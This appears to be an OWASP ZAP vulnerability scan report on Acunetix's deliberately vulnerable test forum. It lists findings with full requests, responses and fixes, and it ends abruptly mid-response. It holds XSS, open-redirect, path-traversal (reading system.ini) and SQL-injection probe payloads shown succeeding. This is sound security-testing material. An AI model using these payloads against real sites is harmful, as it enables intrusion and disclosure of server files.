Risk Level | Number of Alerts |
---|---|
High
|
6
|
Medium
|
3
|
Low
|
7
|
Informational
|
4
|
Name | Risk Level | Number of Instances |
---|---|---|
Cross Site Scripting (DOM Based) | High | 2 |
Cross Site Scripting (Reflected) | High | 1 |
External Redirect | High | 1 |
Path Traversal | High | 1 |
SQL Injection | High | 1 |
SQL Injection - MsSQL | High | 4 |
Absence of Anti-CSRF Tokens | Medium | 275 |
Content Security Policy (CSP) Header Not Set | Medium | 456 |
Missing Anti-clickjacking Header | Medium | 365 |
Application Error Disclosure | Low | 89 |
Cookie No HttpOnly Flag | Low | 2 |
Cookie without SameSite Attribute | Low | 2 |
Information Disclosure - Debug Error Messages | Low | 89 |
Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) | Low | 641 |
Server Leaks Version Information via "Server" HTTP Response Header Field | Low | 641 |
X-Content-Type-Options Header Missing | Low | 370 |
Information Disclosure - Suspicious Comments | Informational | 2 |
Modern Web Application | Informational | 1 |
User Agent Fuzzer | Informational | 96 |
User Controllable HTML Element Attribute (Potential XSS) | Informational | 13 |
HTTP Response Code | Number of Responses |
---|---|
403 Forbidden |
113
|
404 Not Found |
198
|
405 Method Not Allowed |
18
|
200 OK |
2767
|
301 Moved Permanently |
148
|
400 Bad Request |
2
|
302 Found |
312
|
500 Internal Server Error |
1348
|
Parameter Name | Type | Flags | Times Used | # Values |
---|
High |
Cross Site Scripting (DOM Based) |
---|---|
Description |
Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
|
URL | http://testasp.vulnweb.com/Search.asp?name=abc#<img src="random.gif" onerror=alert(5397)> |
Method | GET |
Parameter | |
Attack | ?name=abc#<img src="random.gif" onerror=alert(5397)> |
Evidence | |
Request Header - size: 450 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/ Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
URL | http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG?name=abc#<img src="random.gif" onerror=alert(5397)> |
Method | GET |
Parameter | |
Attack | ?name=abc#<img src="random.gif" onerror=alert(5397)> |
Evidence | |
Request Header - size: 478 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 14 bytes. |
HTTP/1.0 0
|
Response Body - size: 0 bytes. |
|
Instances | 2 |
Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
|
Reference |
http://projects.webappsec.org/Cross-Site-Scripting
http://cwe.mitre.org/data/definitions/79.html |
Tags |
WSTG-v42-CLNT-01
OWASP_2021_A03 OWASP_2017_A07 |
CWE Id | 79 |
WASC Id | 8 |
Plugin Id | 40026 |
High |
Cross Site Scripting (Reflected) |
---|---|
Description |
Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
|
URL | http://testasp.vulnweb.com/Search.asp?tfSearch=%22%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E |
Method | GET |
Parameter | tfSearch |
Attack | "><scrIpt>alert(1);</scRipt> |
Evidence | "><scrIpt>alert(1);</scRipt> |
Request Header - size: 518 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=%22%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:06:20 GMT Content-Length: 3879 |
Response Body - size: 3,879 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%2522%253E%253CscrIpt%253Ealert%25281%2529%253B%253C%252FscRipt%253E" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%2522%253E%253CscrIpt%253Ealert%25281%2529%253B%253C%252FscRipt%253E" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for '"><scrIpt>alert(1);</scRipt>'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:25 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:35 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=1'>Weather</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
Instances | 1 |
Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
Phases: Implementation; Architecture and Design
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
|
Reference |
http://projects.webappsec.org/Cross-Site-Scripting
http://cwe.mitre.org/data/definitions/79.html |
Tags |
OWASP_2021_A03
WSTG-v42-INPV-01 OWASP_2017_A07 |
CWE Id | 79 |
WASC Id | 8 |
Plugin Id | 40012 |
High |
External Redirect |
---|---|
Description |
URL redirectors represent common functionality employed by web sites to forward an incoming request to an alternate resource. This can be done for a variety of reasons and is often done to allow resources to be moved within the directory structure and to avoid breaking functionality for users that request the resource at its previous location. URL redirectors may also be used to implement load balancing, leveraging abbreviated URLs or recording outgoing links. It is this last implementation which is often used in phishing attacks as described in the example below. URL redirectors do not necessarily represent a direct security vulnerability but can be abused by attackers trying to social engineer victims into believing that they are navigating to a site other than the true destination.
|
URL | http://testasp.vulnweb.com/Logout.asp?RetURL=http%3A%2F%2F1673947961492851863.owasp.org |
Method | GET |
Parameter | RetURL |
Attack | http://1673947961492851863.owasp.org |
Evidence | http://1673947961492851863.owasp.org |
Request Header - size: 411 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=http%3A%2F%2F1673947961492851863.owasp.org HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 234 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: http://1673947961492851863.owasp.org Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:06:02 GMT Content-Length: 157 |
Response Body - size: 157 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://1673947961492851863.owasp.org">here</a>.</body> |
Instances | 1 |
Solution |
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Use an allow list of approved URLs or domains to be used for redirection.
Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving your site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems when generating the disclaimer page.
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
For example, ID 1 could map to "/login.asp" and ID 2 could map to "http://www.example.com/". Features such as the ESAPI AccessReferenceMap provide this capability.
Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields.
|
Reference |
http://projects.webappsec.org/URL-Redirector-Abuse
http://cwe.mitre.org/data/definitions/601.html |
Tags |
OWASP_2021_A03
WSTG-v42-CLNT-04 OWASP_2017_A01 |
CWE Id | 601 |
WASC Id | 38 |
Plugin Id | 20019 |
High |
Path Traversal |
---|---|
Description |
The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a way that the web site will execute or reveal the contents of arbitrary files anywhere on the web server. Any device that exposes an HTTP-based interface is potentially vulnerable to Path Traversal.
Most web sites restrict user access to a specific portion of the file-system, typically called the "web document root" or "CGI root" directory. These directories contain the files intended for user access and the executable necessary to drive web application functionality. To access files or execute commands anywhere on the file-system, Path Traversal attacks will utilize the ability of special-characters sequences.
The most basic Path Traversal attack uses the "../" special-character sequence to alter the resource location requested in the URL. Although most popular web servers will prevent this technique from escaping the web document root, alternate encodings of the "../" sequence may help bypass the security filters. These method variations include valid and invalid Unicode-encoding ("..%u2216" or "..%c0%af") of the forward slash character, backslash characters ("..\") on Windows-based servers, URL encoded characters "%2e%2e%2f"), and double URL encoding ("..%255c") of the backslash character.
Even if the web server properly restricts Path Traversal attempts in the URL path, a web application itself may still be vulnerable due to improper handling of user-supplied input. This is a common problem of web applications that use template mechanisms or load static text from files. In variations of the attack, the original URL parameter value is substituted with the file name of one of the web application's dynamic scripts. Consequently, the results can reveal source code because the file is interpreted as text instead of an executable script. These techniques often employ additional special characters such as the dot (".") to reveal the listing of the current working directory, or "%00" NULL characters in order to bypass rudimentary file extension checks.
|
URL | http://testasp.vulnweb.com/Templatize.asp?item=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini |
Method | GET |
Parameter | item |
Attack | ../../../../../../../../../../../../../../../../Windows/system.ini |
Evidence | [drivers] |
Request Header - size: 560 bytes. |
GET http://testasp.vulnweb.com/Templatize.asp?item=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/ Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:05:32 GMT Content-Length: 3180 |
Response Body - size: 3,180 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>Untitled Document</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3D%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252FWindows%252Fsystem%2Eini" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3D%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252FWindows%252Fsystem%2Eini" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> ; for 16-bit app support [386Enh] woafont=dosapp.fon EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON [drivers] wave=mmdrv.dll timer=timer.drv [mci] <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
Instances | 1 |
Solution |
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
For filenames, use stringent allow lists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses, and exclude directory separators such as "/". Use an allow list of allowable file extensions.
Warning: if you attempt to cleanse your data, then do so that the end result is not in the form that can be dangerous. A sanitizing mechanism can remove characters such as '.' and ';' which may be required for some exploits. An attacker can try to fool the sanitizing mechanism into "cleaning" data into a dangerous form. Suppose the attacker injects a '.' inside a filename (e.g. "sensi.tiveFile") and the sanitizing mechanism removes the character resulting in the valid filename, "sensitiveFile". If the input data are now assumed to be safe, then the file may be compromised.
Inputs should be decoded and canonicalized to the application's current internal representation before being validated. Make sure that your application does not decode the same input twice. Such errors could be used to bypass allow list schemes by introducing dangerous inputs after they have been checked.
Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links.
Run your code using the lowest privileges that are required to accomplish the necessary tasks. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by your software.
OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows you to specify restrictions on file operations.
This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
|
Reference |
http://projects.webappsec.org/Path-Traversal
http://cwe.mitre.org/data/definitions/22.html |
Tags |
OWASP_2021_A01
WSTG-v42-ATHZ-01 OWASP_2017_A05 |
CWE Id | 22 |
WASC Id | 33 |
Plugin Id | 6 |
High |
SQL Injection |
---|---|
Description |
SQL injection may be possible
|
URL | http://testasp.vulnweb.com/showthread.asp?id=83+AND+1%3D1+--+ |
Method | POST |
Parameter | id |
Attack | 83 OR 1=1 -- |
Evidence | |
Request Header - size: 431 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=83+AND+1%3D1+--+ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=83 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:06:39 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
